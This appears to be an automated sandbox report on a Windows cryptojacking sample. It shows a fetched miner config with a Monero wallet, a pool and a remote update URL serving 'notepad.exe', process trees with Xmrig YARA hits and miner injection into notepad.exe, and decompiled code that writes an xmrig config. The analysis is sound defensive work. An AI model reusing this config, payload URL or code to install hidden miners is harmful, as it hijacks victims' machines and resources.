                                                                                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                      Last-Modified: Fri, 23 Jul 2021 15:42:46 GMT
                                                                                                      ETag: "776-5c7cc41474980"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 1910
                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                      Data Raw: 5b 4d 69 6e 65 72 5d 0a 61 64 64 72 65 73 73 3d 34 38 51 62 50 5a 55 74 57 6d 38 67 47 36 54 36 65 67 36 48 37 4a 47 58 61 44 36 65 4e 4a 48 38 6f 33 52 6f 79 4c 67 42 65 71 79 6d 37 54 78 79 64 55 39 54 66 4d 66 55 55 67 61 68 65 71 61 37 42 46 64 68 74 66 62 39 64 36 36 35 43 67 59 44 6a 36 66 35 4b 76 64 6a 4c 65 47 4a 6d 64 57 2e 57 4f 52 4b 45 52 2f 70 69 63 6b 74 75 74 6f 73 09 09 09 3b 20 58 4d 52 20 61 64 64 72 65 73 73 2c 20 65 6d 61 69 6c 20 28 6d 69 6e 65 72 67 61 74 65 29 2c 20 62 74 63 20 61 64 64 72 65 73 73 20 28 6e 69 63 65 68 61 73 68 29 2c 20 65 74 63 2e 0a 70 6f 6f 6c 70 6f 72 74 3d 78 6d 72 2d 75 73 2d 65 61 73 74 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 3a 31 34 34 34 34 09 09 3b 20 44 6f 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 73 74 72 61 74 75 6d 2b 74 63 70 3a 2f 2f 27 20 65 2e 67 20 6d 6f 6e 65 72 6f 68 61 73 68 2e 63 6f 6d 3a 33 33 33 33 0a 70 61 73 73 77 6f 72 64 3d 09 09 09 09 3b 20 50 6f 6f 6c 20 70 61 73 73 77 6f 72 64 0a 73 74 6f 70 3d 30 09 09 09 09 09 3b 20 43 68 61 6e 67 65 20 74 68 69 73 20 76 61 6c 75 65 20 74 6f 20 22 31 22 20 74 6f 20 73 74 6f 70 20 6d 69 6e 65 72 2e 20 49 66 20 6e 6f 74 20 73 70 65 63 69 66 69 65 64 20 6f 72 20 65 71 75 61 6c 20 74 6f 20 22 30 22 20 6d 69 6e 65 72 20 77 69 6c 6c 20 77 6f 72 6b 2e 20 0a 70 72 6f 78 79 3d 30 09 09 09 09 09 3b 20 43 68 61 6e 67 65 20 74 68 69 73 20 76 61 6c 75 65 20 74 6f 20 22 31 22 20 69 66 20 79 6f 75 20 61 72 65 20 6d 69 6e 69 6e 67 20 74 6f 20 78 6d 72 69 67 2d 70 72 6f 78 79 20 69 6e 73 74 65 61 64 20 6f 66 20 70 6f 6f 6c 2e 20 54 68 69 73 20 65 6e 61 62 6c 65 73 20 75 73 69 6e 67 20 61 20 75 6e 71 69 75 65 20 61 64 64 72 65 73 73 20 70 65 72 20 77 6f 72 6b 65 72 20 66 6f 72 20 62 65 74 74 65 72 20 6d 69 6e 65 72 20 6d 6f 6e 69 74 6f 72 69 6e 67 2e 0a 6b 65 65 70 61 6c 69 76 65 3d 30 09 09 09 09 3b 20 30 20 74 6f 20 64 69 73 61 62 6c 65 20 6b 65 65 70 61 6c 69 76 65 2c 20 31 20 74 6f 20 65 6e 61 62 6c 65 20 6b 65 65 70 61 6c 69 76 65 0a 0a 5b 55 70 64 61 74 65 5d 0a 3b 63 6f 6e 66 69 67 5f 75 72 6c 3d 68 74 74 70 3a 2f 2f 78 6d 72 6d 69 6e 65 72 2e 6e 65 74 2f 63 6f 6e 66 69 67 2e 74 78 74 20 20 20 09 3b 20 59 6f 75 20 63 61 6e 20 75 70 64 61 74 65 20 74 68 65 20 75 72 6c 20 74 68 61 74 20 70 6f 69 6e 74 73 20 74 6f 20 74 68 65 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 69 6c 65 2e 20 4d 75 73 74 20 62 65 67 69 6e 20 77 69 74 68 20 22 68 74 74 70 3a 2f 2f 22 20 6f 72 20 22 68 74 74 70 73 3a 2f 2f 22 20 0a 6b 6e 6f 63 6b 5f 74 69 6d 65 3d 33 30 20 09 09 09 09 20 20 20 20 20 09 3b 20 4e 75 6d 62 65 72 20 6f 66 20 6d 69 6e 75 74 65 73 20 74 68 65 20 6d 69 6e 65 72 20 77 61 69 74 73 20 62 65 74 77 65 65 6e 20 76 69 73 69 74 73 20 74 6f 20 63 6f 6e 66 69 67 20 66 69 6c 65 2e 20 49 66 20 6e 65 76 65 72 20 73 70 65 63 69 66 69 65 64 2c 20 64 65 66 61 75 6c 74 20 69 73 20 33 30 20 6d 69 6e 75 74 65 73 2e 20 0a 75 70 64 61 74 65 5f 75 72 6c 3d 68 74 74 70 3a 2f 2f 34 35 2e 31 34 34 2e 32 32 35 2e 31 33 35 2f 6e 6f 74 65 70 61 64 2e 65 78 65 09 09 3b 20 75 72 6c 20 6f 66 20 6e 65 77 20 6d 69 6e 65 72 2e 20 4d 69 6e 65 72 20 77 69 6c
                                                                                                      Data Ascii: [Miner]address=48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos; XMR address, email (minergate), btc address (nicehash), etc.poolport=xmr-us-east1.nanopool.org:14444; Do not include 'stratum+tcp://' e.g monerohash.com:3333password=; Pool passwordstop=0; Change this value to "1" to stop miner. If not specified or equal to "0" miner will work. proxy=0; Change this value to "1" if you are mining to xmrig-proxy instead of pool. This enables using a unqiue address per worker for better miner monitoring.keepalive=0; 0 to disable keepalive, 1 to enable keepalive[Update];config_url=http://xmrminer.net/config.txt ; You can update the url that points to the configuration file. Must begin with "http://" or "https://" knock_time=30 ; Number of minutes the miner waits between visits to config file. If never specified, default is 30 minutes. update_url=http://45.144.225.135/notepad.exe; url of new miner. Miner wil
                                                                                                      Jul 23, 2021 22:24:57.931746960 CEST1405INData Raw: 6c 20 67 65 74 20 75 70 64 61 74 65 64 20 77 69 74 68 20 74 68 69 73 20 66 69 6c 65 2e 20 0a 75 70 64 61 74 65 5f 68 61 73 68 3d 64 35 37 32 64 61 39 32 30 32 31 39 36 31 32 31 64 39 35 32 32 33 31 66 32 36 64 36 35 64 30 37 09 09 09 09 3b 20 6d
                                                                                                      Data Ascii: l get updated with this file. update_hash=d572da9202196121d952231f26d65d07; md5 hash of new miner file. 32 characters long (16 byte hexadecimal format for hash). You need to specify this value, othewise miner will not get updated!;End


                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      Analysis Process: 4rC1bQcnl5.exe PID: 4924 Parent PID: 5716

                                                                                                      General

                                                                                                      Start time:22:24:06
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Users\user\Desktop\4rC1bQcnl5.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\Desktop\4rC1bQcnl5.exe'
                                                                                                      Imagebase:0xa20000
                                                                                                      File size:3627520 bytes
                                                                                                      MD5 hash:D572DA9202196121D952231F26D65D07
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                      Reputation:low

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 1864 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:22:24:15
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 5500 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:22:24:21
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 5804 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:22:24:31
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 5212 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:22:24:31
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 5760 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:22:24:32
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 1544 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:22:24:32
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 5920 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:22:24:33
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: SgrmBroker.exe PID: 476 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:22:24:33
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                      Imagebase:0x7ff76b760000
                                                                                                      File size:163336 bytes
                                                                                                      MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 1260 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:22:24:34
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 2880 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:22:24:44
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: 4rC1bQcnl5.exe PID: 4644 Parent PID: 4924

                                                                                                      General

                                                                                                      Start time:22:24:50
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      Imagebase:0x20000
                                                                                                      File size:3627520 bytes
                                                                                                      MD5 hash:D572DA9202196121D952231F26D65D07
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 24%, ReversingLabs
                                                                                                      Reputation:low

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: 4rC1bQcnl5.exe PID: 5932 Parent PID: 4924

                                                                                                      General

                                                                                                      Start time:22:24:51
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      Imagebase:0xc20000
                                                                                                      File size:3627520 bytes
                                                                                                      MD5 hash:D572DA9202196121D952231F26D65D07
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000002.496587950.0000000001480000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.496587950.0000000001480000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.504581184.00000000037C0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: oQOWFbKllEKo.exe PID: 3440 Parent PID: 5932

                                                                                                      General

                                                                                                      Start time:22:24:53
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe
                                                                                                      Imagebase:0xdc0000
                                                                                                      File size:909312 bytes
                                                                                                      MD5 hash:77276DDC82248473D033E2494C438A97
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.327781499.0000000001460000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.332660306.0000000001460000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.329749766.0000000001460000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: notepad.exe PID: 5064 Parent PID: 5932

                                                                                                      General

                                                                                                      Start time:22:24:57
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\notepad.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'
                                                                                                      Imagebase:0x7ff6f6cb0000
                                                                                                      File size:245760 bytes
                                                                                                      MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000002.495647676.00000000009D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000002.496766519.0000020F8DC2A000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: cmd.exe PID: 2952 Parent PID: 5932

                                                                                                      General

                                                                                                      Start time:22:25:20
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                                                                                                      Imagebase:0x150000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 2176 Parent PID: 2952

                                                                                                      General

                                                                                                      Start time:22:25:21
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: wscript.exe PID: 5056 Parent PID: 2952

                                                                                                      General

                                                                                                      Start time:22:25:21
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                                                                                                      Imagebase:0xa50000
                                                                                                      File size:147456 bytes
                                                                                                      MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: MpCmdRun.exe PID: 988 Parent PID: 1260

                                                                                                      General

                                                                                                      Start time:22:25:35
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                      Imagebase:0x7ff777c00000
                                                                                                      File size:455656 bytes
                                                                                                      MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 5196 Parent PID: 988

                                                                                                      General

                                                                                                      Start time:22:25:37
                                                                                                      Start date:23/07/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                      Reset < >

                                                                                                        Analysis Process: 4rC1bQcnl5.exe PID: 5932 Parent PID: 4924 4rC1bQcnl5.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 00403CA0, Relevance: 151.0, APIs: 7, Strings: 79, Instructions: 511nativefileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 78%
                                                                                                        			E00403CA0(char* __ecx, void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				long _v28;
				void* _v32;
				long _v36;
				long _v40;
				intOrPtr _v44;
				char* _v48;
				long _v52;
				void* _v56;
				long _v60;
				void* _v64;
				long _v68;
				long _v72;
				struct _SYSTEM_INFO _v108;
				char _v2156;
				char _v2676;
				void* _t129;
				char* _t132;
				signed int _t137;
				void* _t139;
				long _t150;
				char* _t282;
				char* _t284;
				void* _t321;
				void* _t323;
				void* _t334;
				void* _t336;

				_t334 = __edx;
				_t331 = __ecx;
				_t129 =  *0x5d2df0; // 0x324
				_t336 = _a4;
				if(_t336 == 0) {
					_t129 =  *0x5d2124; // 0x3d0
				}
				if(_t129 != 0 && _t129 != 0xffffffff) {
					NtClose(_t129);
				}
				E00401A00( &_v2676, "C:\ProgramData\LKBNMTFJgl");
				_t132 =  &_v2676;
				if(_t336 == 0) {
					_push(L"\\cfg");
				} else {
					_push(L"\\cfgi");
				}
				_push(_t132);
				E00401970();
				E00401BB0( &_v2156, 0, 0x800);
				_a4 = 0;
				_v56 = 0;
				asm("xorps xmm0, xmm0");
				_v36 = 0;
				asm("movups [ebp-0x30], xmm0");
				_v32 = 0;
				_v28 = 0;
				_v64 = 0;
				_v60 = 0;
				_v72 = 0;
				_v68 = 0;
				GetSystemInfo( &_v108); // executed
				if(_t336 != 0) {
					_t137 = _v108.dwNumberOfProcessors;
					if( *0x5d130c != 1) {
						goto L11;
					} else {
						if(_t137 >= 1) {
							goto L17;
						} else {
							_t139 = 1;
						}
					}
					goto L18;
				} else {
					if( *0x5d1308 != 2) {
						E004017E0( &_v12, "1");
					} else {
						_t137 = _v108.dwNumberOfProcessors;
						L11:
						asm("cdq");
						_t137 = _t137 - _t334 >> 1;
						if(_t137 >= 1) {
							L17:
							_t139 =  >  ? 0xff : _t137;
						} else {
							_t139 = 1;
						}
						L18:
						_t331 =  &_v12;
						E00401550(_t139,  &_v12);
					}
				}
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x10], xmm0");
				_push(0);
				_push(0);
				_push( &_v20);
				_push( &_v2676);
				if( *0x5d10b8() != 1) {
					L29:
					return 0; // executed
				} else {
					_v56 = 0x18;
					_v48 =  &_v20;
					_v52 = 0;
					_v44 = 0x40;
					_v40 = 0;
					_v36 = 0;
					_t150 = NtCreateFile( &_a4, 0x120116,  &_v56,  &_v32,  &_v64, 0x80, 0, 0, 0x60, 0, 0); // executed
					if(_t150 != 0) {
						goto L29;
					} else {
						E004017E0( &_v2156, "{\r\n\t\"api\": {");
						E004016E0( &_v2156, "\r\n\t\t\"id\": null,");
						E004016E0( &_v2156, "\r\n\t\t\"worker-id\": null");
						E004016E0( &_v2156, "\r\n\t},");
						E004016E0( &_v2156, "\r\n\t\"http\": {");
						E004016E0( &_v2156, "\r\n\t\t\"enabled\": false");
						E004016E0( &_v2156, "\r\n\t},");
						E004016E0( &_v2156, "\r\n\t\"autosave\": false,");
						E004016E0( &_v2156, "\r\n\t\"version\": 1,");
						E004016E0( &_v2156, "\r\n\t\"background\": false,");
						E004016E0( &_v2156, "\r\n\t\"colors\": true,");
						E004016E0( &_v2156, "\r\n\t\"randomx\": {");
						E004016E0( &_v2156, "\r\n\t\t\"init\": 1,");
						E004016E0( &_v2156, "\r\n\t\t\"numa\": true");
						E004016E0( &_v2156, "\r\n\t},");
						E004016E0( &_v2156, "\r\n\t\"cpu\": {");
						E004016E0( &_v2156, "\r\n\t\t\"enabled\": true,");
						E004016E0( &_v2156, "\r\n\t\t\"huge-pages\": true,");
						E004016E0( &_v2156, "\r\n\t\t\"hw-aes\": null,");
						E004016E0( &_v2156, "\r\n\t\t\"priority\": null,");
						E004016E0( &_v2156, "\r\n\t\t\"memory-pool\": false,");
						E004016E0( &_v2156, "\r\n\t\t\"asm\": true,");
						E004016E0( &_v2156, "\r\n\t\t\"argon2-impl\": null,");
						E004016E0( &_v2156, "\r\n\t\t\"cpu-profile\": {");
						E004016E0( &_v2156, "\r\n\t\t\t\"threads\": ");
						E004016E0( &_v2156,  &_v12);
						E004016E0( &_v2156, "\r\n\t\t},");
						E004016E0( &_v2156, "\r\n\t\t\"cn-heavy/0\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-heavy/xhv\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-heavy/tube\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-lite/0\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-lite/1\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn/r\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn/fast\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn-gpu\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn/half\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"cn/2\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"argon2/chukwa\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"argon2/wrkz\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx/0\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx/loki\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx/wow\": \"cpu-profile\",");
						E004016E0( &_v2156, "\r\n\t\t\"rx/arq\": \"cpu-profile\"");
						E004016E0( &_v2156, "\r\n\t},");
						E004016E0( &_v2156, "\r\n\t\"donate-level\": ");
						E004016E0( &_v2156, "0");
						E004016E0( &_v2156, ",");
						E004016E0( &_v2156, "\r\n\t\"donate-over-proxy\": 0,");
						E004016E0( &_v2156, "\r\n\t\"log-file\": null,");
						E004016E0( &_v2156, "\r\n\t\"pools\": [");
						E004016E0( &_v2156, "\r\n\t\t{");
						E004016E0( &_v2156, "\r\n\t\t\t\"algo\": null,");
						E004016E0( &_v2156, "\r\n\t\t\t\"coin\": \"monero\",");
						E004016E0( &_v2156, "\r\n\t\t\t\"url\": \"");
						E004016E0( &_v2156, _a8);
						E004016E0( &_v2156, "\",");
						E004016E0( &_v2156, "\r\n\t\t\t\"user\": \"");
						E004016E0( &_v2156, _a12);
						E004016E0( &_v2156, "\",");
						E004016E0( &_v2156, "\r\n\t\t\t\"pass\": \"");
						E004016E0( &_v2156, _a16);
						E004016E0( &_v2156, "\",");
